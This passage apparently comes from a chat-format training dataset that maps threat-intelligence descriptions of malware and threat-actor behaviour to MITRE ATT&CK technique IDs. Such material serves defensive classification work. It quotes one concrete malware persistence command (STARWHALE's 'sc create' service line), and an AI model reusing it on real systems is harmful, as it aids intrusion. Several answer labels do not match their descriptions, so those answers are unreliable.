- Exfiltration Over C2 Channel', 'T1048 - Exfiltration Over Alternative Protocol', 'T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chaes has used .MSI files as an initial way to start the infection chain." }, { "role": "assistant", "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kazuar captures images from the webcam." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RemoteUtilities can upload and download files to and from a target machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 has collected schemas and user accounts from systems running SQL Server." }, { "role": "assistant", "content": "T1213 - Data from Information Repositories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Get2 has the ability to identify the current username of an infected host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "opens the Windows Firewall to modify incoming connections." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RegDuke can store its encryption key in the Registry." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacMa has used a custom JSON-based protocol for its C&C communications." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Astaroth uses WMIC to execute payloads." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This data is gathered into an information structure which the RAT zips with an 8 bytes random generated password, which is then XORed with one byte" }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used the Plink utility to tunnel RDP back to C2 infrastructure." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used filenames and Registry key names associated with Windows Defender." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER compromised three Japanese websites using a Flash exploit to perform watering hole attacks." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can gather the hostname and the OS version to ensure it doesn’t run on a Windows XP or Windows Server 2003 systems." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has conducted SQL injection attacks, exploited vulnerabilities CVE-2019-19781 and CVE-2020-0688 for Citrix and MS Exchange, and CVE-2018-13379 for Fortinet VPNs." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gorgon Group malware can use process hollowing to inject one of its trojans into another process." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla and its RPC backdoors have used APIs calls for various tasks related to subverting AMSI and accessing then executing commands through RPC and/or named pipes." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrifeWater can self delete to cover its tracks." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Temporary audio and video files are stored within the audio and video sub-folders respectively. After a call is finished, this data is compressed and encrypted using the same techniques previously witnessed. These files are stored in randomly named .dat files within the Skype folder" }, { "role": "assistant", "content": "T1123 - Audio Capture', 'T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Chrome extension is installed and maintained by a number of plist files written to the user directory ~/Library/LaunchAgent/. To conceal the malicious behavior, the underlying commands in the plist files are obfuscated with Base64 encoding." }, { "role": "assistant", "content": "T1647 - Plist File Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has conducted research against potential victim websites as part of its operational planning." }, { "role": "assistant", "content": "T1594 - Search Victim-Owned Websites" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to add its own account to the victim's machine." }, { "role": "assistant", "content": "T1136 - Create Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Many strings in are obfuscated with a XOR algorithm." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rising Sun can clear a memory blog in the process by overwriting it with junk bytes." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ferocious Kitten has acquired domains imitating legitimate sites." }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif has used hooked APIs to take screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remsec is capable of listing contents of folders on the victim. Remsec also searches for custom network encryption software on victims." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Neoichor can upload files from a victim's machine." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware’s second functionality is to gain persistence on an infected machine. After obtaining persistence, the next functionality of Linux Rabbit is to brute force SSH passwords which ultimately allows the malware to install the cryptocurrency miner onto the server. The SSH brute forcing begins by the malware first generating a random IPv4 string and checking its geolocation to see where it is located. If the IP is located within a country that is “blacklisted,” it will stop and move on until it finds an IP that is located in an allowed geolocation, which for this malware are Russia, South Korea, the UK, and the US. Once an allowed IP location is discovered, Linux Rabbit will check to see if an SSH server is listening on Port 22. The malware will open a socket to see if it receives a response, and if it does, it will attempt to obtain the machine’s hostname. If the TLD is not blacklisted, the malware will run through a process of authentication utilizing a list of hard-coded credentials it has" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has encoded payloads with a single-byte XOR, both skipping the key itself and zeroing in an attempt to avoid exposing the key." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Traditional antivirus software and other systems that rely on low-level indicators do not effectively detect and block common and pervasive malware" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet has been seen exploiting SMB via a vulnerability exploit like EternalBlue (MS17-010) to achieve lateral movement and propagation." }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkWatchman has used a DGA to generate a domain name for C2." }, { "role": "assistant", "content": "T1568.002 - Domain Generation Algorithms" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe)." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ServHelper contains a module for downloading and executing DLLs that leverages \"rundll32.exe\"." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In order to avoid in-memory scanning during runtime, the payload encrypts all of the function blocks before executing the actual malicious routine. Afterwards, whenever it needs to use a function, it will decrypt the function, execute it, and encrypt the function back again, as can be seen in Figure 4. If a function will not be used on the rest of the execution, it will be scrambled by another mess-up function, as illustrated in Figure 6. The mess-up function muddles up the bytes with random values and makes the input blocks unrecoverable. The purpose of this is to further avoid being detected by a certain cybersecurity solution" }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERTON has used AES for encrypting C2 traffic." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Trojan.Karagany has used plugins with a self-delete capability." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors developed their own custom webshells to upload to compromised servers." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After opening the doc file (which is again a Web Archive File), the exploit drops and executes the Trojan program “svcmondr.exe” (8052234dcd41a7d619acb0ec9636be0b)." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rising Sun can archive data using RC4 encryption and Base64 encoding prior to exfiltration." }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails. The wave against the government entity (June 26) also involved a simple PE file attachment (SHA256: d948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520) using the filename tafahom.exe. This PE was slightly different from the other attack, being compiled using the Microsoft .NET Framework instead of being generated via a bat2exe tool and containing a decoy dialog box as shown in Figure 1" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda has used RAR to create password-protected archives of collected documents prior to exfiltration." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We have identified several implants that leveraged PowerShell, VBS, JS, and dotnet for resilience and persistence. The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates random long string folder names in temp directories to host the collected files per category before compressing, encrypting and uploading to the C2 server" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can enumerate drives and Remote Desktop sessions." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim’s traffic and tamper with it in any way they please" }, { "role": "assistant", "content": "T1557 - Adversary-in-the-Middle" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The same situation applies to authentication by key pair – the server contains a pre-defined constant public key and it allows authentication only if a particular private key is used" }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pupy can obtain a list of SIDs and provide the option for selecting process tokens to impersonate." }, { "role": "assistant", "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has used PowerShell profiles to maintain persistence on an infected machine." }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As with every communication with the C2, the script collects and sends information about the target environment including the stack of security solutions installed on the computer and are part of the following list" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mongall can inject a DLL into `rundll32.exe` for execution." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY can search for modifiable services that could be used for privilege escalation." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has collected information from Microsoft SharePoint services within target networks." }, { "role": "assistant", "content": "T1213.002 - Sharepoint" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Dust Storm, the threat actors executed JavaScript code via `mshta.exe`." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla RPC backdoors can collect files from USB thumb drives." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Apart for its backdoor routines, this malware can steal information through keylogging, audio recording, and screen capture" }, { "role": "assistant", "content": "T1113 - Screen Capture', 'T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to execute the command ipconfig /all." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In order to discover potential targets and locate the information it needs to authenticate against, the script passively collects data from /.ssh/config, .bash_history, /.ssh/known_hosts, and the likes. We did not identify any active scanning techniques used to identify additional targets" }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nebulae can create a service to establish persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conficker will copy itself with a random name into the system directory %systemroot%\\system32 and register itself as a service" }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot has arguably been one of the most popular Trojans for the past couple of years, used by threat actors mostly because of its modular design and highly resilient infrastructure. Bitdefender researchers even analyzed one of its modules earlier this year, particularly because it targeted telecom, education, and financial services in the US and Hong Kong" }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can modify service configurations." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Something that makes Kobalos unique is the fact that the code for running a C&C server is in Kobalos itself. Any server compromised by Kobalos can be turned into a C&C server by the operators sending a single command. As the C&C server IP addresses and ports are hardcoded into the executable, the operators can then generate new Kobalos samples that use this new C&C server" }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wingbird performs multiple process injections to hijack system processes and execute malicious code." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UEFI bootkits are planted in the system firmware and are invisible to security software running within the operating system because the malware loads in the initial stage of the booting sequence." }, { "role": "assistant", "content": "T1542.001 - Pre-OS Boot: System Firmware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PingPull has the ability to install itself as a service." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete has scanned and looked for cryptographic keys and certificate file extensions." }, { "role": "assistant", "content": "T1552.004 - Unsecured Credentials: Private Keys" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conti can discover files on a local system." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "STARWHALE has the ability to create the following Windows service to establish persistence on an infected host: `sc create Windowscarpstss binpath= \"cmd.exe /c cscript.exe c:\\\\windows\\\\system32\\\\w7_1.wsf humpback_whale\" start= \"auto\" obj= \"LocalSystem\"`." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After the driver is loaded, the VSS service is disabled using the Control Service Manager. Following this, a number of additional threads are created. A thread is created to handle the system reboot. It will sleep for the time specified by a command line parameter of 35 minutes, at which point the system will be restarted by an API call to InitializeSystemShutdownExW" }, { "role": "assistant", "content": "T1134 - Access Token Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Winnti for Linux has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity." }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. This domain was not only used to send the phishing e-mails, but also to track which targets opened the e-mail. Within each of the HTML-formatted messages, an embedded image tag is used to beacon home to the attacker's domain, containing an unique identifier specific to the recipient. While the use of e-mail recipient tracking, a linked RTF document, and a final payload (QuasarRAT variant) remained the same, certain elements differed across campaigns observed. Exploitation and Malware Execution . Upon opening the above attachments, the recipient will be presented with a document that is a direct copy of a blog post or report released by the think tank organization being impersonated. Its called the \"packager trick\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"scriptlet\" file, or .sct file, which is also embedded in the malicious RTF document. The Patchwork threat actors also appear to have adopted a technique seen from other APT groups where they are now tracking the effectiveness of their campaigns by recording which recipients have opened the phishing message. Contact . Connect . This Website uses cookies, which are necessary to its functioning and required to achieve the purposes illustrated in our Cookie Policy" }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 used WMI event subscriptions for persistence." }, { "role": "assistant", "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "File hunting plugin: The most frequently used plugin, similar to one used in 2014. Often used to collect Office files from temporary internet history. Detailed survey plugin: Used to gather domain membership, processes/loaded modules, hardware enumeration, installed products, logical and mapped drive information. Evolution of earlier plugin used in 2014. Browser plugin: Used to steal browser history, stored passwords and sessions. Works with Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex. File listing plugin: Works on local or remote drives and can map additional paths when given credentials" }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dridex can perform browser attacks via web injects to steal information such as credentials, certificates, and cookies." }, { "role": "assistant", "content": "T1185 - Browser Session Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Penquin can execute the command code \"do_download\" to retrieve remote files from C2." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has acquired Amazon S3 buckets to use in C2." }, { "role": "assistant", "content": "T1583.006 - Web Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and 